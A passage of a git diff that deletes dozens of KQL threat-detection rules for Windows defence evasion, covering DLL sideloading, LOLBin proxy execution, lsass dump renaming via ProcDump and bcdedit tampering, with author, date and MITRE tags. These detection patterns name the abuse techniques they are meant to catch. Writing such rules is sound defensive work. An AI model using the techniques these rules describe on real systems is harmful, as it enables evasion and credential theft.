-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql b/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql
deleted file mode 100644
index 0b840a5c..00000000
--- a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
-// Date: 2020/10/14
-// Level: medium
-// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql b/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql
deleted file mode 100644
index cd1604d6..00000000
--- a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander McDonald
-// Date: 2022/06/24
-// Level: high
-// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql
deleted file mode 100644
index 65ae682e..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql
deleted file mode 100644
index 413eb321..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/08/02
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Provisioning\\Commands"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql b/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql
deleted file mode 100644
index 3d2de651..00000000
--- a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: medium
-// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql b/Defense Evasion/Potential_Qakbot_Registry_Activity.kql
deleted file mode 100644
index ad4f810d..00000000
--- a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hieu Tran
-// Date: 2023/03/13
-// Level: high
-// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql b/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql b/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql
deleted file mode 100644
index aacb4100..00000000
--- a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/11/05
-// Level: medium
-// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql b/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql
deleted file mode 100644
index c2b94749..00000000
--- a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/13
-// Level: medium
-// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n "))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql b/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql b/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql
deleted file mode 100644
index a90ebb2b..00000000
--- a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh, '@cyb3rjy0t'
-// Date: 2023/01/21
-// Level: high
-// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql b/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql
deleted file mode 100644
index 1bf5a890..00000000
--- a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql
deleted file mode 100644
index dcb505a7..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: high
-// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql
deleted file mode 100644
index cf35cdc2..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/12
-// Level: high
-// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey contains "\\Policies\\Microsoft\\Windows\\Appx") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql b/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql b/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql
deleted file mode 100644
index 8c70124d..00000000
--- a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
-The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
-Attackers abuse this utility to install malicious MOF scripts
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql b/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql
deleted file mode 100644
index d95b611c..00000000
--- a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: medium
-// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql b/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql
deleted file mode 100644
index 4bfe12e2..00000000
--- a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/29
-// Level: medium
-// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
-Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql b/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql
deleted file mode 100644
index 5269be55..00000000
--- a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith 